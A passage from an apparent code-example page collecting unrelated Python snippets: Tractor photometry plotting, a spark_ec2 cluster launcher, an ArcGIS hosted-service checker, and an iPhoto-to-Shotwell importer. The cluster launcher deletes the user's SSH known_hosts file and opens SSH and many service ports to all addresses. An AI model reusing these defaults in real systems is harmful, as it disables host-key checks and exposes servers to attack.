            # print 'Fitting params:'
            # tractor.printThawedParams()

            minsig = 0.1

            # making plots?
            #if celli <= 10:
            #    mod0 = tractor.getModelImage(0)

            # Forced photometry
            X = tractor.optimize_forced_photometry(
                #minsb=minsig*sigma, mindlnp=1., minFlux=None,
                variance=True, fitstats=True, shared_params=False,
                sky=opt.fitsky,
                use_ceres=True, BW=8, BH=8)
            IV = X.IV
            fs = X.fitstats

            print('Forced photometry took', Time()-t0)
            
            # print 'Fit params:'
            # tractor.printThawedParams()

            # Record results
            X = np.zeros(len(T), np.float32)
            X[catI] = np.array([src.getBrightness().getBand(band) for src in cat]).astype(np.float32)
            T.set('tractor_%s_nanomaggies' % band, X)
            X = np.zeros(len(T), np.float32)
            X[catI] = IV.astype(np.float32)
            T.set('tractor_%s_nanomaggies_invvar' % band, X)
            X = np.zeros(len(T), bool)
            X[catI] = True
            T.set('tractor_%s_has_phot' % band, X)

            # DEBUG
            X = np.zeros(len(T), np.float64)
            X[catI] = np.array([src.getPosition().ra for src in cat])
            T.tractor_ra = X
            X = np.zeros(len(T), np.float64)
            X[catI] = np.array([src.getPosition().dec for src in cat])
            T.tractor_dec = X

            T.cell = np.zeros(len(T), int) + celli
            if fs is not None:
                # Per-source stats
                for k in ['prochi2', 'pronpix', 'profracflux', 'proflux', 'npix']:
                    T.set(k, getattr(fs, k))
                # Per-image stats
                for k in imstatkeys:
                    X = getattr(fs, k)
                    imstats.get(k)[celli] = X[0]

            #T.about()
            # DEBUG
            ## KK = np.flatnonzero(T.tractor_u_nanomaggies[catI] > 3.)
            ## T.cut(catI[KK])
            ## cat = [cat[k] for k in KK]
            ## catI = np.arange(len(cat))
            ## #T.about()
            ## print T.tractor_u_nanomaggies
            ## print T.psfflux[:,0]

            results.append(T.copy())

            # tc = T.copy()
            # print 'tc'
            # print tc.tractor_u_nanomaggies
            # print tc.psfflux[:,0]
            # plot_results(None, ps, tc)
            # mc = merge_tables([x.copy() for x in results])
            # print 'Results:'
            # for x in results:
            #     print x.tractor_u_nanomaggies
            #     print x.psfflux[:,0]
            # print 'Merged'
            # print mc.tractor_u_nanomaggies
            # print mc.psfflux[:,0]
            # plot_results(None, ps, mc)

            # Make plots for the first N cells
            if celli >= 10:
                continue
    
            mod = tractor.getModelImage(0)
            ima = dict(interpolation='nearest', origin='lower',
                       vmin=sky + -2. * sigma, vmax=sky + 5. * sigma,
                       cmap='gray', extent=[ix0-0.5, ix1-0.5, iy0-0.5, iy1-0.5])

            ok,rc,dc = wcs.pixelxy2radec((ix0+ix1)/2., (iy0+iy1)/2.)

            plt.clf()
            plt.imshow(img, **ima)
            plt.title('Data: ~ (%.3f, %.3f)' % (rc,dc))
            #ps.savefig()

            ax = plt.axis()
            plt.plot(T.x-1, T.y-1, 'o', mec='r', mfc='none', ms=10)
            plt.axis(ax)
            plt.title('Data + SDSS sources ~ (%.3f, %.3f)' % (rc,dc))
            ps.savefig()

            flim = 2.5
            I = np.flatnonzero(T.psfflux[catI,0] > flim)
            for ii in I:
                tind = catI[ii]
                src = cat[ii]
                fluxes = [T.psfflux[tind,0], src.getBrightness().getBand(band)]
                print('Fluxes', fluxes)
                mags = [-2.5*(np.log10(flux)-9) for flux in fluxes]
                print('Mags', mags)

                t = ''
                if type(src) == ExpGalaxy:
                    t = 'E'
                elif type(src) == DevGalaxy:
                    t = 'D'
                elif type(src) == PointSource:
                    t = 'S'
                elif type(src) == FixedCompositeGalaxy:
                    t = 'C'
                else:
                    t = str(type(src))

                plt.text(T.x[tind], T.y[tind]+3, '%.1f / %.1f %s' % (mags[0], mags[1], t), color='r',
                         va='bottom',
                         bbox=dict(facecolor='k', alpha=0.5))
                plt.plot(T.x[tind]-1, T.y[tind]-1, 'rx')

            for i,src in enumerate(cat):
                flux = src.getBrightness().getBand(band)
                if flux < flim:
                    continue
                tind = catI[i]
                fluxes = [T.psfflux[tind,0], flux]
                print('RA,Dec', T.ra[tind],T.dec[tind])
                print(src.getPosition())
                print('Fluxes', fluxes)
                mags = [-2.5*(np.log10(flux)-9) for flux in fluxes]
                print('Mags', mags)
                plt.text(T.x[tind], T.y[tind]-3, '%.1f / %.1f' % (mags[0], mags[1]), color='g',
                         va='top', bbox=dict(facecolor='k', alpha=0.5))
                plt.plot(T.x[tind]-1, T.y[tind]-1, 'g.')
                         
            plt.axis(ax)
            ps.savefig()

            # plt.clf()
            # plt.imshow(mod0, **ima)
            # plt.title('Initial Model')
            # #plt.colorbar()
            # ps.savefig()

            # plt.clf()
            # plt.imshow(mod0, interpolation='nearest', origin='lower',
            #            cmap='gray', extent=[ix0-0.5, ix1-0.5, iy0-0.5, iy1-0.5])
            # plt.title('Initial Model')
            # plt.colorbar()
            # ps.savefig()

            plt.clf()
            plt.imshow(mod, **ima)
            plt.title('Model')
            ps.savefig()
            
            noise = np.random.normal(scale=sigma, size=img.shape)
            plt.clf()
            plt.imshow(mod + noise, **ima)
            plt.title('Model + noise')
            ps.savefig()
            
            chi = (img - mod) * tim.getInvError()
            plt.clf()
            plt.imshow(chi, interpolation='nearest', origin='lower',
                       cmap='RdBu', vmin=-5, vmax=5)
            plt.title('Chi')
            ps.savefig()
    

    # Merge results from the cells
    TT = merge_tables(results)
    # Cut to just the sources within the cells
    TT.cut(TT.inbounds)
    TT.delete_column('inbounds')
    # Sort them back into original order
    TT.cut(np.argsort(TT.row))
    #TT.delete_column('row')
    TT.writeto(opt.outfn)
    print('Wrote results to', opt.outfn)
    
    if opt.statsfn:
        imstats.writeto(opt.statsfn)
        print('Wrote image statistics to', opt.statsfn)

    plot_results(opt.outfn, ps)

Example 38

Project: sparknotebook
Source File: spark_ec2.py
View license
def launch_cluster(conn, opts, cluster_name):

  #Remove known hosts to avoid "Offending key for IP ..." errors.
  known_hosts = os.environ['HOME'] + "/.ssh/known_hosts"
  if os.path.isfile(known_hosts):
    os.remove(known_hosts)
  if opts.key_pair is None:
      opts.key_pair = keypair()
      if opts.key_pair is None:
        print >> stderr, "ERROR: Must provide a key pair name (-k) to use on instances."
        sys.exit(1)

  if opts.profile is None:
    opts.profile = profile()
    if opts.profile is None:
      print >> stderr, "ERROR: No profile found in current host. It be provided with -p option."
      sys.exit(1)

  public_key = pub_key()
  user_data = Template("""#!/bin/bash
  set -e -x
  echo '$public_key' >> ~root/.ssh/authorized_keys
  echo '$public_key' >> ~ec2-user/.ssh/authorized_keys""").substitute(public_key=public_key)

  print "Setting up security groups..."
  master_group = get_or_make_group(conn, cluster_name + "-master")
  slave_group = get_or_make_group(conn, cluster_name + "-slaves")
  sparknotebook_group = get_or_make_group(conn, "SparkNotebookApplication")
  if master_group.rules == []: # Group was just now created
    master_group.authorize(src_group=master_group)
    master_group.authorize(src_group=slave_group)
    master_group.authorize(src_group=sparknotebook_group)
    master_group.authorize('tcp', 22, 22, '0.0.0.0/0')
    master_group.authorize('tcp', 8080, 8081, '0.0.0.0/0')
    master_group.authorize('tcp', 18080, 18080, '0.0.0.0/0')
    master_group.authorize('tcp', 19999, 19999, '0.0.0.0/0')
    master_group.authorize('tcp', 50030, 50030, '0.0.0.0/0')
    master_group.authorize('tcp', 50070, 50070, '0.0.0.0/0')
    master_group.authorize('tcp', 60070, 60070, '0.0.0.0/0')
    master_group.authorize('tcp', 4040, 4045, '0.0.0.0/0')
    master_group.authorize('tcp', 7077, 7077, '0.0.0.0/0')
    if opts.ganglia:
      master_group.authorize('tcp', 5080, 5080, '0.0.0.0/0')
  if slave_group.rules == []: # Group was just now created
    slave_group.authorize(src_group=master_group)
    slave_group.authorize(src_group=slave_group)
    slave_group.authorize(src_group=sparknotebook_group)
    slave_group.authorize('tcp', 22, 22, '0.0.0.0/0')
    slave_group.authorize('tcp', 8080, 8081, '0.0.0.0/0')
    slave_group.authorize('tcp', 50060, 50060, '0.0.0.0/0')
    slave_group.authorize('tcp', 50075, 50075, '0.0.0.0/0')
    slave_group.authorize('tcp', 60060, 60060, '0.0.0.0/0')
    slave_group.authorize('tcp', 60075, 60075, '0.0.0.0/0')

  if not any(r for r in sparknotebook_group.rules for g in r.grants if master_group.id == g.group_id):
    sparknotebook_group.authorize(ip_protocol="tcp", from_port="1", to_port="65535", src_group=master_group)
    sparknotebook_group.authorize(ip_protocol="icmp", from_port="-1", to_port="-1", src_group=master_group)

  if not any(r for r in sparknotebook_group.rules for g in r.grants if slave_group.id == g.group_id):
    sparknotebook_group.authorize(ip_protocol="tcp", from_port="1", to_port="65535", src_group=slave_group)
    sparknotebook_group.authorize(ip_protocol="icmp", from_port="-1", to_port="-1", src_group=slave_group)

  # Check if instances are already running in our groups
  existing_masters, existing_slaves = get_existing_cluster(conn, opts, cluster_name,
                                                           die_on_error=False)
  if existing_slaves or (existing_masters and not opts.use_existing_master):
    print >> stderr,("ERROR: There are already instances running in " +
        "group %s or %s" % (master_group.name, slave_group.name))
    sys.exit(1)

  # Figure out Spark AMI
  if opts.ami is None:
    opts.ami = get_spark_ami(opts)
  print "Launching instances..."

  try:
    image = conn.get_all_images(image_ids=[opts.ami])[0]
  except:
    print >> stderr,"Could not find AMI " + opts.ami
    sys.exit(1)

  # Create block device mapping so that we can add an EBS volume if asked to
  block_map = BlockDeviceMapping()
  if opts.ebs_vol_size > 0:
    device = EBSBlockDeviceType()
    device.size = opts.ebs_vol_size
    device.delete_on_termination = True
    block_map["/dev/sdv"] = device

  # Launch slaves
  if opts.spot_price != None:
    zones = get_zones(conn, opts)
    
    num_zones = len(zones)
    i = 0
    my_req_ids = []

    for zone in zones:
      best_price = find_best_price(conn,opts.instance_type,zone, opts.spot_price)
      # Launch spot instances with the requested price
      print >> stderr,("Requesting %d slaves as spot instances with price $%.3f/hour each (total $%.3f/hour)" %
           (opts.slaves, best_price, opts.slaves * best_price))

      num_slaves_this_zone = get_partition(opts.slaves, num_zones, i)
      interface = boto.ec2.networkinterface.NetworkInterfaceSpecification(subnet_id=subnetId(), groups=[slave_group.id], associate_public_ip_address=True)
      interfaces = boto.ec2.networkinterface.NetworkInterfaceCollection(interface)

      slave_reqs = conn.request_spot_instances(
          price = best_price,
          image_id = opts.ami,
          launch_group = "launch-group-%s" % cluster_name,
          placement = zone,
          count = num_slaves_this_zone,
          key_name = opts.key_pair,
          instance_type = opts.instance_type,
          block_device_map = block_map,
          user_data = user_data,
          instance_profile_arn = opts.profile,
          network_interfaces = interfaces)
      my_req_ids += [req.id for req in slave_reqs]
      i += 1

    print >> stderr, "Waiting for spot instances to be granted"
    try:
      while True:
        time.sleep(10)
        reqs = conn.get_all_spot_instance_requests()
        id_to_req = {}
        for r in reqs:
          id_to_req[r.id] = r
        active_instance_ids = []
        for i in my_req_ids:
          if i in id_to_req and id_to_req[i].state == "active":
            active_instance_ids.append(id_to_req[i].instance_id)
        if len(active_instance_ids) == opts.slaves:
          print >> stderr, "All %d slaves granted" % opts.slaves
          reservations = conn.get_all_instances(active_instance_ids)
          slave_nodes = []
          for r in reservations:
            slave_nodes += r.instances
          break
        else:
          # print >> stderr, ".",
          print "%d of %d slaves granted, waiting longer" % (
            len(active_instance_ids), opts.slaves)
    except:
      print >> stderr, "Canceling spot instance requests"
      conn.cancel_spot_instance_requests(my_req_ids)
      # Log a warning if any of these requests actually launched instances:
      (master_nodes, slave_nodes) = get_existing_cluster(
          conn, opts, cluster_name, die_on_error=False)
      running = len(master_nodes) + len(slave_nodes)
      if running:
        print >> stderr,("WARNING: %d instances are still running" % running)
      sys.exit(0)
  else:
    # Launch non-spot instances
    zones = get_zones(conn, opts)
    num_zones = len(zones)
    i = 0
    slave_nodes = []
    for zone in zones:
      num_slaves_this_zone = get_partition(opts.slaves, num_zones, i)
      if num_slaves_this_zone > 0:
        slave_res = image.run(key_name = opts.key_pair,
                              security_group_ids = [slave_group.id],
                              instance_type = opts.instance_type,
                              subnet_id = subnetId(),
                              placement = zone,
                              min_count = num_slaves_this_zone,
                              max_count = num_slaves_this_zone,
                              block_device_map = block_map,
                              user_data = user_data,
                              instance_profile_arn = opts.profile)
        slave_nodes += slave_res.instances
        print >> stderr,"Launched %d slaves in %s, regid = %s" % (num_slaves_this_zone,
                                                        zone, slave_res.id)
      i += 1

  # Launch or resume masters
  if existing_masters:
    print "Starting master..."
    for inst in existing_masters:
      if inst.state not in ["shutting-down", "terminated"]:
        inst.start()
    master_nodes = existing_masters
  else:
    master_type = opts.master_instance_type
    if master_type == "":
      master_type = opts.instance_type
    if opts.zone == 'all':
      opts.zone = random.choice(conn.get_all_zones()).name
    if opts.spot_price != None:
      best_price = find_best_price(conn,master_type,opts.zone,opts.spot_price)
      # Launch spot instances with the requested price
      print >> stderr, ("Requesting master as spot instances with price $%.3f/hour" % (best_price))

      interface = boto.ec2.networkinterface.NetworkInterfaceSpecification(subnet_id=subnetId(), groups=[master_group.id], associate_public_ip_address=True)
      interfaces = boto.ec2.networkinterface.NetworkInterfaceCollection(interface)

      master_reqs = conn.request_spot_instances(
        price = best_price,
        image_id = opts.ami,
        launch_group = "launch-group-%s" % cluster_name,
        placement = opts.zone,
        count = 1,
        key_name = opts.key_pair,
        instance_type = master_type,
        block_device_map = block_map,
        user_data = user_data,
        instance_profile_arn = opts.profile,
        network_interfaces = interfaces)
      my_req_ids = [r.id for r in master_reqs]
      print >> stderr, "Waiting for spot instance to be granted"
      try:
        while True:
          time.sleep(10)
          reqs = conn.get_all_spot_instance_requests(request_ids=my_req_ids)
          id_to_req = {}
          for r in reqs:
            id_to_req[r.id] = r
          active_instance_ids = []
          for i in my_req_ids:
            if i in id_to_req and id_to_req[i].state == "active":
              active_instance_ids.append(id_to_req[i].instance_id)
          if len(active_instance_ids) == 1:
            print >> stderr, "Master granted"
            reservations = conn.get_all_instances(active_instance_ids)
            master_nodes = []
            for r in reservations:
              master_nodes += r.instances
            break
          else:
            # print >> stderr, ".",
            print "%d of %d masters granted, waiting longer" % (
              len(active_instance_ids), 1)
      except:
        print >> stderr, "Canceling spot instance requests"
        conn.cancel_spot_instance_requests(my_req_ids)
        # Log a warning if any of these requests actually launched instances:
        (master_nodes, master_nodes) = get_existing_cluster(
            conn, opts, cluster_name, die_on_error=False)
        running = len(master_nodes) + len(master_nodes)
        if running:
          print >> stderr, ("WARNING: %d instances are still running" % running)
        sys.exit(0)
    else:
      master_res = image.run(key_name = opts.key_pair,
                             security_group_ids = [master_group.id],
                             instance_type = master_type,
                             subnet_id = subnetId(),
                             placement = opts.zone,
                             min_count = 1,
                             max_count = 1,
                             block_device_map = block_map,
                             user_data = user_data,
                             instance_profile_arn = opts.profile)
      master_nodes = master_res.instances
      print >> stderr,"Launched master in %s, regid = %s" % (zone, master_res.id)
  # Return all the instances
  return (master_nodes, slave_nodes)

Example 39

View license
def main():
    exit_err_code = 1
    
    # Print/get script arguments
    results = print_args()
    if not results:
        sys.exit(exit_err_code)
    portal_address, adminuser, password = results
    
    total_success = True
    title_break_count = 100
    section_break_count = 75
    search_query = None
    
    print '=' * title_break_count
    print 'Validate Hosted Service Sources'
    print '=' * title_break_count
    
    source_items = []
    hosted_items = []
    
    root_folder_path = None
    root_folder_path = tempfile.mkdtemp()
    print 'Temporary directory: {}'.format(root_folder_path)
    
    orig_dir = os.getcwd()
    
    try:
        portal = Portal(portal_address, adminuser, password)
        items = portal.search()
        
        # ---------------------------------------------------------------------
        #  Get info about hosted service source items
        # (currently service definitions)
        # ---------------------------------------------------------------------
        
        for item in items:
            
            if item['type'] == 'Service Definition':
                
                print '\nDownloading and extracting Service Definition item {}'.format(item['id'])
                
                # Download .sd file
                download_root_path = os.path.join(root_folder_path, item['id'])
                os.mkdir(download_root_path)
                download_path = portal.item_datad(item['id'], download_root_path)
                
                # Extract serviceconfiguration.json file from downloaded .sd file
                file_name = 'serviceconfiguration.json'
                extract_path = download_path.replace('.sd', '')
                #print extract_path
                os.mkdir(extract_path)
                err_stat = extractFromSDFile(download_path, extract_path, file_name)
                print 'Extract status: {}'.format(err_stat)
        
                # Open extract .json file
                file_path = findFilePath(extract_path, file_name)
                os.chdir(os.path.dirname(file_path))
                service_config = json.load(open(file_name))
                
                # [{id: val, owner: val, title: val, type: val
                # service_config: {stuff from .json file}}]
                d = {
                    'id': item['id'],
                    'owner': item['owner'],
                    'title': item['title'],
                    'type': item['type'],
                    'service_config': service_config
                    }
                source_items.append(d)

        # ---------------------------------------------------------------------
        # Get info about hosted service items
        # ---------------------------------------------------------------------
        print '\nDetermine what hosted services exist...'
        h_service_items = get_hosted_service_items(portal, items)
        
        for item in h_service_items:
            d = {
                'id': item['id'],
                'owner': item['owner'],
                'title': item['title'],
                'type': item['type'],
                'url': item['url']
                }
            hosted_items.append(d)

        # ---------------------------------------------------------------------
        # For each hosted service find the associated source item
        # ---------------------------------------------------------------------
        print '=' * section_break_count
        print '\nDetermine which source items are associated with each hosted service...'
        print '=' * section_break_count
        num_hosted_no_match = 0
        num_hosted_match = 0
        num_hosted_mismatch_owner = 0
        write_str = "\tid: {:<34}owner: {:<20}type: {:<25}service: {:<50}\n"
        
        for hosted_d in hosted_items:
            found = False
            found_num = 0
            
            # Get last components of URL (i.e., SRTM_V2_56020/FeatureServer)
            hosted_url = '/'.join(hosted_d['url'].split('/')[-2:])
            
            print '\n{}'.format('-' * 100)
            print 'Hosted Service Item:   Title - "{}"\n'.format(hosted_d['title'])
            
            hosted_str = write_str.format(
                hosted_d['id'],
                hosted_d['owner'],
                hosted_d['type'],
                hosted_url)
            print hosted_str
            
            # Look for match in source items
            print '\tMatching Source Item:'

            for source_d in source_items:
                src_service_info = source_d['service_config']['service']
                src_service_name = src_service_info['serviceName']
                src_service_type = src_service_info['type']
                src_service_url = '{}/{}'.format(src_service_name, src_service_type)
                if hosted_url == src_service_url:
                    found = True
                    found_num += 1
        
                    match_str = write_str.format(
                        source_d['id'],
                        source_d['owner'],
                        source_d['type'],
                        src_service_url)
                    print '\n\tTitle: "{}"'.format(source_d['title'])
                    print match_str
                    
                    if source_d['owner'] != hosted_d['owner']:
                        print '*** ERROR: owner does not match hosted service item owner.'
                        num_hosted_mismatch_owner += 1
                        
            if found_num == 0:
                print '*** ERROR: no matching source item found.'
            if found_num > 1:
                print '*** ERROR: there is more then one matching source item found.'
                
            if found:
                num_hosted_match += 1
            else:
                num_hosted_no_match += 1
    

        # ---------------------------------------------------------------------
        # For each source item find the associated hosted service
        # ---------------------------------------------------------------------
        print '=' * section_break_count
        print '\nDetermine which hosted services are associated with each source item...'
        print '=' * section_break_count
        num_source_no_match = 0
        num_source_match = 0
        num_source_mismatch_owner = 0
        write_str = "\tid: {:<34}owner: {:<20}type: {:<25}service: {:<50}\n"
        
        for source_d in source_items:
            found = False
            found_num = 0
        
            src_service_info = source_d['service_config']['service']
            src_service_name = src_service_info['serviceName']
            src_service_type = src_service_info['type']
            src_service_url = '{}/{}'.format(src_service_name, src_service_type)
                
                
            print '\n{}'.format('-' * 100)
            print 'Source Item:   Title - "{}"\n'.format(source_d['title'])
            
            source_str = write_str.format(
                source_d['id'],
                source_d['owner'],
                source_d['type'],
                src_service_url)
            print source_str
            
            # Look for match in source items
            print '\tMatching Hosted Service:'
        
            for hosted_d in hosted_items:
        
                # Get last components of URL (i.e., SRTM_V2_56020/FeatureServer)
                hosted_url = '/'.join(hosted_d['url'].split('/')[-2:])
            
                if hosted_url == src_service_url:
                    found = True
                    found_num += 1
        
                    match_str = write_str.format(
                        hosted_d['id'],
                        hosted_d['owner'],
                        hosted_d['type'],
                        hosted_url)
                    print '\n\tTitle: "{}"'.format(hosted_d['title'])
                    print match_str
            
                    if hosted_d['owner'] != source_d['owner']:
                        print '*** ERROR: owner does not match associated source owner.'
                        num_source_mismatch_owner += 1
                        
            if found_num == 0:
                print '*** ERROR: no matching hosted service found.'
            if found_num > 1:
                print '*** ERROR: there is more then one hosted service found.'
                
            if found:
                num_source_match += 1
            else:
                num_source_no_match += 1

        print '\n{}'.format('=' * section_break_count)
        print 'Summary:\n'
        print 'Number of hosted services: {}'.format(len(hosted_items))
        print 'With matching source item: {}'.format(num_hosted_match)
        print 'With NO matching source item: {}'.format(num_hosted_no_match)
        print 'With mis-matching owners: {}'.format(num_hosted_mismatch_owner)

        print '\nNumber of source items: {}'.format(len(source_items))
        print 'With matching hosted service: {}'.format(num_source_match)
        print 'With NO matching hosted service: {}'.format(num_source_no_match)        
        print 'With mis-matching owners: {}'.format(num_source_mismatch_owner)
        
    except:
        total_success = False
        
        # Get the traceback object
        tb = sys.exc_info()[2]
        tbinfo = traceback.format_tb(tb)[0]
     
        # Concatenate information together concerning the error 
        # into a message string
        pymsg = "PYTHON ERRORS:\nTraceback info:\n" + tbinfo + \
                "\nError Info:\n" + str(sys.exc_info()[1])
        
        # Print Python error messages for use in Python / Python Window
        print
        print "***** ERROR ENCOUNTERED *****"
        print pymsg + "\n"
        
    finally:
        os.chdir(orig_dir)
        if root_folder_path:
            shutil.rmtree(root_folder_path)
            
        print '\nDone.'
        if total_success:
            sys.exit(0)
        else:
            sys.exit(exit_err_code)

Example 40

View license
def import_photos(iphoto_dir, shotwell_db, photos_dir):
    # Sanity check the iPhoto dir and Shotwell DB.
    _log.debug("Performing sanity checks on iPhoto and Shotwell DBs.")
    now = int(time.time())
    album_data_filename = join_path(iphoto_dir, "AlbumData.xml")
    if not os.path.exists(album_data_filename):
        _log.error("Failed to find expected file inside iPhoto library: %s", 
                   album_data_filename)
        sys.exit(1)
    if not os.path.exists(shotwell_db):
        _log.error("Shotwell DB not found at %s", shotwell_db)
        sys.exit(2)
    db = sqlite3.connect(shotwell_db) #@UndefinedVariable
    with db:
        cursor = db.execute("SELECT schema_version from VersionTable;")
        schema_version = cursor.fetchone()[0]
        if schema_version not in SUPPORTED_SHOTWELL_SCHEMAS:
            _log.error("Shotwell DB uses unsupported schema version %s. "
                       "Giving up, just to be safe.", schema_version)
            sys.exit(3)
        _log.debug("Sanity checks passed.")
        
        # Back up the Shotwell DB.
        fmt_now = time.strftime('%Y-%m-%d_%H%M%S')
        db_backup = "%s.iphotobak_%s" % (shotwell_db, fmt_now)
        _log.debug("Backing up shotwell DB to %s", db_backup)
        shutil.copy(shotwell_db, db_backup)
        _log.debug("Backup complete")
        
        # Load and parse the iPhoto DB.
        _log.debug("Loading the iPhoto library file. Might take a while for a large DB!")
        album_data = plistlib.readPlist(album_data_filename)
        _log.debug("Finished loading the iPhoto library.")
        path_prefix = album_data["Archive Path"]
        def fix_prefix(path, new_prefix=iphoto_dir):
            if path:
                if path[:len(path_prefix)] != path_prefix:
                    raise AssertionError("Path %s didn't begin with %s" % (path, path_prefix))
                path = path[len(path_prefix):]
                path = join_path(new_prefix, path.strip(os.path.sep)) 
            return path
        photos = {} # Map from photo ID to photo info.
        copy_queue = []
        
#                  id = 224
#            filename = /home/shaun/Pictures/Photos/2008/03/24/DSCN2416 (Modified (2)).JPG
#               width = 1600
#              height = 1200
#            filesize = 480914
#           timestamp = 1348718403
#       exposure_time = 1206392706
#         orientation = 1
#original_orientation = 1
#           import_id = 1348941635
#            event_id = 3
#     transformations = 
#                 md5 = 3ca3cf05312d0c1a4c141bb582fc43d0
#       thumbnail_md5 = 
#            exif_md5 = cec27a47c34c89f571c0fd4e9eb4a9fe
#        time_created = 1348941635
#               flags = 0
#              rating = 0
#         file_format = 0
#               title = 
#           backlinks = 
#     time_reimported = 
#         editable_id = 1
#      metadata_dirty = 1
#           developer = SHOTWELL
# develop_shotwell_id = -1
#   develop_camera_id = -1
# develop_embedded_id = -1
        skipped = []
        for key, i_photo in album_data["Master Image List"].items():
            mod_image_path = fix_prefix(i_photo.get("ImagePath", None))
            orig_image_path = fix_prefix(i_photo.get("OriginalPath", None))
            
            new_mod_path = fix_prefix(i_photo.get("ImagePath"), new_prefix=photos_dir)
            new_orig_path = fix_prefix(i_photo.get("OriginalPath", None), 
                                       new_prefix=photos_dir)
            
            if not orig_image_path or not os.path.exists(mod_image_path):
                orig_image_path = mod_image_path
                new_orig_path = new_mod_path
                new_mod_path = None
                mod_image_path = None
                mod_file_size = None
            else:
                mod_file_size = os.path.getsize(mod_image_path)
                
            if not os.path.exists(orig_image_path):
                _log.error("Original file not found %s", orig_image_path)
                skipped.append(orig_image_path)
                continue
            
            copy_queue.append((orig_image_path, new_orig_path))
            if mod_image_path: copy_queue.append((mod_image_path, new_mod_path))
                
            mime, _ = mimetypes.guess_type(orig_image_path)
                
            sys.stdout.write('.')
            sys.stdout.flush()
            if mime not in ("image/jpeg", "image/png", "image/x-ms-bmp", "image/tiff"):
                print
                _log.error("Skipping %s, it's not an image %s", orig_image_path, mime)
                skipped.append(orig_image_path)
                continue
            
            caption = i_photo.get("Caption", "")
            
            img = Image.open(orig_image_path)
            w, h = img.size
            
            md5 = md5_for_file(orig_image_path)
            orig_timestamp = int(os.path.getmtime(orig_image_path))
            
            mod_w, mod_h, mod_md5, mod_timestamp = None, None, None, None
            if mod_image_path:
                try:
                    mod_img = Image.open(mod_image_path)
                except Exception:
                    _log.error("Failed to open modified image %s, skipping", mod_image_path)
                    orig_image_path = mod_image_path
                    new_orig_path = new_mod_path
                    new_mod_path = None
                    mod_image_path = None
                    mod_file_size = None
                else:
                    mod_w, mod_h = mod_img.size
                    mod_md5 = md5_for_file(mod_image_path)
                    mod_timestamp = int(os.path.getmtime(mod_image_path))
            
            file_format = FILE_FORMAT.get(mime, -1)
            if file_format == -1:
                raise Exception("Unknown image type %s" % mime)
            
            photo = {"orig_image_path": orig_image_path,
                           "mod_image_path": mod_image_path,
                           "new_mod_path": new_mod_path,
                           "new_orig_path": new_orig_path,
                           "orig_file_size": os.path.getsize(orig_image_path),
                           "mod_file_size": mod_file_size,
                           "mod_timestamp": mod_timestamp,
                           "orig_timestamp": orig_timestamp,
                           "caption": caption,
                           "rating": i_photo["Rating"],
                           "event": i_photo["Roll"],
                           "orig_exposure_time": int(parse_date(i_photo["DateAsTimerInterval"])),
                           "width": w,
                           "height": h,
                           "mod_width": mod_w,
                           "mod_height": mod_h,
                           "orig_md5": md5,
                           "mod_md5": md5,
                           "file_format": file_format,
                           "time_created": now,
                           "import_id": now,
                           }
            def read_metadata(path, photo, prefix="orig_"):
                photo[prefix + "orientation"] = 1
                photo[prefix + "original_orientation"] = 1
                try:
                    meta = ImageMetadata(path)
                    meta.read()
                    try:
                        photo[prefix + "orientation"] = meta["Exif.Image.Orientation"].value
                        photo[prefix + "original_orientation"] = meta["Exif.Image.Orientation"].value
                    except KeyError:
                        print
                        _log.debug("Failed to read the orientation from %s" % path)
                    exposure_dt = meta["Exif.Image.DateTime"].value
                    photo[prefix + "exposure_time"] = exif_datetime_to_time(exposure_dt)
                except KeyError:
                    pass
                except Exception:
                    print
                    _log.exception("Failed to read date from %s", path)
                    raise
                    
            try:
                read_metadata(orig_image_path, photo, "orig_")
                photo["orientation"] = photo["orig_orientation"]
                if mod_image_path:
                    read_metadata(mod_image_path, photo, "mod_")
                    photo["orientation"] = photo["mod_orientation"]
            except Exception:
                _log.error("**** Skipping %s" % orig_image_path)
                skipped.append(orig_image_path)
                continue
            
            photos[key] = photo
        
        events = {}
        for event in album_data["List of Rolls"]:
            key = event["RollID"]
            events[key] = {
                "date": parse_date(event["RollDateAsTimerInterval"]),
                "key_photo": event["KeyPhotoKey"], 
                "photos": event["KeyList"],
                "name": event["RollName"]
            }
            for photo_key in event["KeyList"]:
                assert photo_key not in photos or photos[photo_key]["event"] == key
        
        # Insert into the Shotwell DB.
        for _, event in events.items():
            c = db.execute("""
                INSERT INTO EventTable (time_created, name) 
                VALUES (?, ?)
            """, (event["date"], event["name"]))
            assert c.lastrowid is not None
            event["row_id"] = c.lastrowid
            for photo_key in event["photos"]:
                if photo_key in photos:
                    photos[photo_key]["event_id"] = event["row_id"]

        
            
        for key, photo in photos.items():
            # The BackingPhotoTable
#                  id = 1
#            filepath = /home/shaun/Pictures/Photos/2008/03/24/DSCN2416 (Modified (2))_modified.JPG
#           timestamp = 1348968706
#            filesize = 1064375
#               width = 1600
#              height = 1200
#original_orientation = 1
#         file_format = 0
#        time_created = 1348945103
            if "event_id" not in photo:
                _log.error("Photo didn't have an event: %s", photo)
                skipped.append(photo["orig_image_path"])
                continue
            editable_id = -1
            if photo["mod_image_path"] is not None:
                # This photo has a backing image
                c = db.execute("""
                    INSERT INTO BackingPhotoTable (filepath,
                                                   timestamp,
                                                   filesize,
                                                   width,
                                                   height,
                                                   original_orientation,
                                                   file_format,
                                                   time_created)
                    VALUES (:new_mod_path,
                            :mod_timestamp,
                            :mod_file_size,
                            :mod_width,
                            :mod_height,
                            :mod_original_orientation,
                            :file_format,
                            :time_created)
                """, photo)
                editable_id = c.lastrowid
            
            photo["editable_id"] = editable_id
            try:
                c = db.execute("""
                    INSERT INTO PhotoTable (filename,
                                            width,
                                            height,
                                            filesize,
                                            timestamp,
                                            exposure_time,
                                            orientation,
                                            original_orientation,
                                            import_id,
                                            event_id,
                                            md5,
                                            time_created,
                                            flags,
                                            rating,
                                            file_format,
                                            title,
                                            editable_id,
                                            metadata_dirty,
                                            developer,
                                            develop_shotwell_id,
                                            develop_camera_id,
                                            develop_embedded_id)
                    VALUES (:new_orig_path,
                            :width,
                            :height,
                            :orig_file_size,
                            :orig_timestamp,
                            :orig_exposure_time,
                            :orientation,
                            :orig_original_orientation,
                            :import_id,
                            :event_id,
                            :orig_md5,
                            :time_created,
                            0,
                            :rating,
                            :file_format,
                            :caption,
                            :editable_id,
                            1,
                            'SHOTWELL',
                            -1,
                            -1,
                            -1);
                """, photo)
            except Exception:
                _log.exception("Failed to insert photo %s" % photo)
                raise
            
        print >> sys.stderr, "Skipped importing these files:\n", "\n".join(skipped)
        print >> sys.stderr, "%s file skipped (they will still be copied)" % len(skipped)
        
        for src, dst in copy_queue:
            safe_link_file(src, dst)
        
        db.commit()

Example 41

Project: GrepBugs
